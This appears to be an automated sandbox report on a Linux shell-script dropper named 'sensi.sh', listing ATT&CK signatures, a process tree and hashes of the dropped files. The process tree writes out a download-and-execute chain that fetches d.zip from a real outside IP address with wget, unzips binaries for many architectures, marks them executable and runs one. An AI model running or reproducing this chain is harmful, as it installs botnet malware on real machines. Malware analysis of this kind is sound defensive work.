58d5bc84e8dcfd88e55fb4408562e6e091a6fdc30698b94a91ce0c48fdce8770

Analysis

max time kernel
43s
max time network
45s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
26-12-2024 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sensi.sh
Size

616B
MD5

16a80dae144d0b28b41b1bc690560eb4
SHA1

f5656969be23544e08a5b6dc59444ad8d9f4075a
SHA256

58d5bc84e8dcfd88e55fb4408562e6e091a6fdc30698b94a91ce0c48fdce8770
SHA512

3e04f1b5d9aea830e52e9a619bfc4f5fffca455268b1379fd22ccd5ede4e8693510db2054f68fdf21cc8ab4c183db274a3ad87f54be84b42f32616aba6f55a96

Score

7^/10

credential_access defense_evasion discovery execution persistence upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
794	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/var/lib/dpkg/info/unzip.postinst	786	unzip.postinst

OS Credential Dumping 1 TTPs 1 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

description	ioc	Process
File opened for reading	/etc/shadow	dpkg-preconfigure

Deletes log files 1 TTPs 1 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/apt/eipp.log.xz	apt

Write file to user bin folder 4 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/bin/unzipsfx.dpkg-new	dpkg
File opened for modification	/usr/bin/zipgrep.dpkg-new	dpkg
File opened for modification	/usr/bin/funzip.dpkg-new	dpkg
File opened for modification	/usr/bin/unzip.dpkg-new	dpkg

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-29.dat	upx

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/ngroups_max	apt
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg

System Network Configuration Discovery 1 TTPs 8 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
774	dpkg-split
774	dpkg-split
774	dpkg-split
786	unzip.postinst
792	wget
793	unzip
712	apt
774	dpkg-split

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileutl.message.6wzzUA	apt
File opened for modification	/tmp/fileutl.message.W6fzzR	apt
File opened for modification	/tmp/fileutl.message.FE3Q5G	apt
File opened for modification	/tmp/fileutl.message.IwpWpd	apt
File opened for modification	/tmp/d/xd.arm7	unzip
File opened for modification	/tmp/d/xd.mips	unzip
File opened for modification	/tmp/fileutl.message.oYZBTa	apt
File opened for modification	/tmp/fileutl.message.sJIh2l	apt
File opened for modification	/tmp/d/xd.ppc	unzip
File opened for modification	/tmp/d/xd.x86	unzip
File opened for modification	/tmp/d/xd.arm	unzip
File opened for modification	/tmp/d/xd.sh4	unzip
File opened for modification	/tmp/fileutl.message.muIUAf	apt
File opened for modification	/tmp/d.zip	wget
File opened for modification	/tmp/d/xd.spc	unzip
File opened for modification	/tmp/d/xd.m68k	unzip
File opened for modification	/tmp/d/xd.arm5	unzip
File opened for modification	/tmp/d/xd.mpsl	unzip
File opened for modification	/tmp/fileutl.message.BR6DWI	apt
File opened for modification	/tmp/d/xd.arm6	unzip

Software Deployment Tools 1 TTPs 2 IoCs

Use software deployment tools to execute code.

execution

Software Deployment Tools

T1072

pid	Process
774	dpkg-split
783	dpkg

/tmp/sensi.sh
/tmp/sensi.sh
1⤵
PID:709
- /usr/bin/apt
  apt install -y wget unzip
  2⤵
  - Deletes log files
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:712
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:720
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:731
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:752
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:753
- - /bin/sh
    /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"
    3⤵
    PID:754
  - - /usr/sbin/dpkg-preconfigure
      /usr/sbin/dpkg-preconfigure --apt
      4⤵
      OS Credential Dumping
      PID:755
    - - /usr/local/sbin/locale
        
        locale charmap
        5⤵
        
        PID:759
    - - /usr/local/bin/locale
        
        locale charmap
        5⤵
        
        PID:759
    - - /usr/sbin/locale
        
        locale charmap
        5⤵
        
        PID:759
    - - /usr/bin/locale
        
        locale charmap
        5⤵
        
        PID:759
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:760
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:761
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:762
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:763
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:764
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:765
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:766
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:767
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:768
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:769
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:770
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:771
- - /usr/bin/dpkg
    /usr/bin/dpkg --assert-multi-arch
    3⤵
    - Reads runtime system information
    PID:772
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
    3⤵
    - Write file to user bin folder
    - Reads runtime system information
    PID:773
  - - /usr/local/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      System Network Configuration Discovery
      PID:774
  - - /usr/local/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      System Network Configuration Discovery
      PID:774
  - - /usr/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      System Network Configuration Discovery
      PID:774
  - - /usr/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      System Network Configuration Discovery
      Software Deployment Tools
      PID:774
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:775
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:775
  - - /usr/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:775
  - - /usr/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:775
    - - /usr/local/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:778
    - - /usr/local/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:778
    - - /usr/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:778
    - - /usr/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:778
    - - /sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:778
    - - /bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        Reads runtime system information
        
        PID:778
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      PID:779
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      PID:779
  - - /usr/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      PID:779
  - - /usr/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mips.deb
      4⤵
      PID:779
  - - /usr/local/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
  - - /usr/local/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
  - - /usr/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
  - - /usr/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
  - - /sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
  - - /bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:782
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --configure --pending
    3⤵
    - Reads runtime system information
    - Software Deployment Tools
    PID:783
  - - /var/lib/dpkg/info/mime-support.postinst
      /var/lib/dpkg/info/mime-support.postinst triggered /usr/lib/mime/packages
      4⤵
      PID:784
    - - /usr/sbin/update-mime
        
        /usr/sbin/update-mime --triggered
        5⤵
        
        PID:785
  - - /var/lib/dpkg/info/unzip.postinst
      /var/lib/dpkg/info/unzip.postinst configure
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery
      PID:786
    - - /usr/bin/which
        
        which update-mime
        5⤵
        
        PID:787
    - - /usr/sbin/update-mime
        
        update-mime
        5⤵
        
        PID:788
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:789
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:790
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:791
- /usr/bin/wget
  wget http://107.150.62.186/d.zip
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:792
- /usr/bin/unzip
  unzip d.zip
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:793
- /bin/chmod
  chmod +x xd.arm xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.spc xd.x86
  2⤵
  - File and Directory Permissions Modification
  PID:794
- /tmp/d/xd.x86
  ./xd.x86
  2⤵
  PID:795

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Software Deployment Tools

T1072

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

OS Credential Dumping

T1003

/etc/passwd and /etc/shadow

T1003.008

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Software Deployment Tools

T1072

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/d.zip

Filesize
349KB

MD5
9df87e61955d14d79c4dc948cbdcfb4b

SHA1
c0447a1a37c7f8ce24e6fb9919221a4d89a0dc74

SHA256
5d45fb31f1e8db1be7decb957041eb0a12802ce9a95e7fcc19d1794cea1b8d0a

SHA512
f6c96d88f80961d9036fea24d5d765c14ec573ca946d19e255a66d13b803f3e3c96c956a7daf65ee04b48b0f302817c85aaa3e45fd8930dc7b163f6f070a3bda

Download Submit
/tmp/d/xd.arm6

Filesize
33KB

MD5
5e15e25f22fc8090e7b02fb87845ae61

SHA1
115eace8a1131084fc9303ad4da2ad1ed2366125

SHA256
202a3205d0b9965e89fd62467165b82fca3e1932eec1b85b10bf9e2959098b23

SHA512
b760c1b1e60df0f6898af8304f433c1e619adafbe74d88815b1bf1c6749f0fd3754ef01d48e28e06a04b84db1755d94ab3f8e4871b9a8b4688510c8df6a145ec

Download Submit
/var/cache/apt/archives/partial/unzip_6.0-21+deb9u2_mips.deb

Filesize
161KB

MD5
0969e97281fd309f8ac6f51ce9ee018c

SHA1
b0a2f9c3685c4e846f2d1972073588c391861e52

SHA256
f5f3d73f4e7f4d845edb657f38be1981d8d99f03e03124a59a8f24385f52fb7c

SHA512
e5ed3e93b1c004754753fcf949e076a84c9066a86280d5c5ea88832a94a0857499ff44c30216e581901097a8871457938836f38c39e235652ab2f5ecc43ffbfa

Download Submit
/var/lib/dpkg/status-new

Filesize
402KB

MD5
4a1a2b8c527c1c8b1519595ea3af46a1

SHA1
3bff80bfbdcc74f8e657cdac5d055f6be28d5944

SHA256
87992ce158c9158969cf09b57c26a744b86896e8949047e0440721424be8621f

SHA512
a87fecc4d59d5ed09fc761d8bf9af63fd241d1d0a37fb4ce88cd86754215be71cd5438ae97b62a9a83ec094a675abdff06b3720dd8781e0d71f3fb096d3f8e3c

Download Submit
/var/lib/dpkg/status-new

Filesize
402KB

MD5
e0de6c90373f5d14af560b61be33a9cc

SHA1
87bd9c7e07bef96f00c8a6c4c2edac8689e6d8ab

SHA256
6c61c49e45fb2ca60d7669b31884e47c85035de341e57c52adc22186076f02cb

SHA512
19880c55f552a6976abb49a0d7d2e49b186f936ebdd85f849107b3cd160449d914b62c7f7f613b4d13bff0a65dd74731c67687cff53f4564001ab7570ac826c0

Download Submit
/var/lib/dpkg/tmp.ci/control

Filesize
595B

MD5
379dbc5f8d068cd65d81d66754f10d05

SHA1
8f12cca441e93de296fe9258db7cabb7c644bafa

SHA256
c628e73379eb43cfb22fe9af8076231833e0476796597ec318c814c69a4c7cf3

SHA512
40e6d919d87d589f2ea3763a0407ea62c573afdde673f6ea7c8bb56982129d7f6f1798d63f441ba6b3046411affa0fa7049413e08b5f6881beda2f3ab7ad1fa7

Download Submit
/var/lib/dpkg/tmp.ci/md5sums

Filesize
963B

MD5
c0e40797a0f3cd70da0a103f1755a5c2

SHA1
5b4634a8845f66c1625049319c69ff96a07479f3

SHA256
2fd5dea95f13d177646c62c982c145f991a64e9666ff6b73c0d35b835b036c6d

SHA512
ba83e0b2e359f57f0698772f78b37eb87683eff1a52b5e8c36eafb9f8f1e86e599dfb35f548824e1d98a2afb09b7b10f580cbffa6c0f1912a34924a433631fcf

Download Submit
/var/lib/dpkg/tmp.ci/postinst

Filesize
111B

MD5
40f076ea46271a47ab5b6ae60f3be867

SHA1
cf28e1141f93864226311300d023c1b5b1d7af72

SHA256
6ecdb1415319c81c14a94114a279186a8054c221fe6c63b8a8a2ce38b8b39966

SHA512
5dbf0c2700b5cfe252452df348bc2be9999b007258cb805a46bc37848deefd2918aaf4dc96a3f5b6c01f08c05cff8dee61aa66d7b840d49ef52a1a2a08d220ed

Download Submit
/var/lib/dpkg/tmp.ci/postrm

Filesize
78B

MD5
ceeea1caaa2b0bec75134102648ef302

SHA1
2bee404eb1355636cf146c61c6587be9c3182dc2

SHA256
27793cfe5796bf9b694e2e2ce532d62917dcad70b64b8a160947f84fd279008a

SHA512
13817a4d31ef99fc3de31b4714782a4ffc1d4f21a603de8d39706c88a87bd75c9a808f5868846d80f0480860ee70171569637d1addb3f9a583c29048537273d9

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
01488aa1c2ad2277811502126011ff47

SHA1
0481793510a41175b3a14f8788b2b995cc9388c5

SHA256
d95a4f69059fd1fee84c5e418501bfa754ef3dd0f74543fbc7fa8e25c921216f

SHA512
9348e46948d482d4d6d19c6fec091884daaaf61a4bed2b439765588f25759cf96ca0f001d87d3b5103708cdac83be48ff3602a8dc52d3dc7cdc4ff4afdbd1cc7

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
fe5fee5e423920d0c3e7b3e7332b487f

SHA1
dc554f24d4c0b25ada06caad577f8766689823c9

SHA256
adfe569ffebd3ca7313bfb7890aa931c03a7e7f101142bd4c4e1e311cec55b12

SHA512
50ac1c87021fd945edf37dfc37f47a798848b007f18876a2bf00bc6796167e7549f3212c4033d35017bf19f13e29ff83cb39f9450151f6d1101241db2c72de6d

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
c66d3a6c4582d22afd908ec7e88cb0bc

SHA1
5038432cdf3b2bdd8dfd146b04559d768a38a10e

SHA256
583f2cd6ddef2260dc5678eb58d55c94f44c7531d67cdc2e5c2fdc826f80d489

SHA512
de686a0df892bc0b3c6ea5aeca98cd9f17228e3f609049e2d870751de9d8e48cc1bca065a6685765b380ffcb01328db9a6bd7b3a1cedf736e232ec72eb91febf

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
edae9b7299f2afc09258160786a4dada

SHA1
dd7aa0c8aa29e937efd88b9eb39811e1460b62b9

SHA256
cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569

SHA512
0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
df74d53d4c55dbb41c11ad7f9b46a99b

SHA1
2e23f903494187cf254e63d66cd8eee68fd24381

SHA256
56c76606f9aafca520295099abeb533eaa95b9a82d1cb58343e85d24b38c2b22

SHA512
92ab5139750c74ba39ea2358e8b488d1e3c5315d3c3038abc511cb38b29a91547a7929d2e0570e1ebff6dcd4aea07d84b9ae351c8c5017afbb1412603119cca0

Download Submit
/var/log/apt/eipp.log.xz

Filesize
18KB

MD5
775a3bb95221341c1ac36eb8972894e8

SHA1
fae03bb69fe814658707a8fd7597577351db17f1

SHA256
316188d086f4ff79deaeb38a85d3cfdd4255cf368a5278ca751ad31c1076b323

SHA512
cb9cf0e73abd2eb6bcc5f9db489bd20fcad1422f1368e6affa1eb630e5008e4ac4b423c1e0dad4dcfd8c4566058853279b765b4a05091cd1b5c405f36b2ee9cd

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads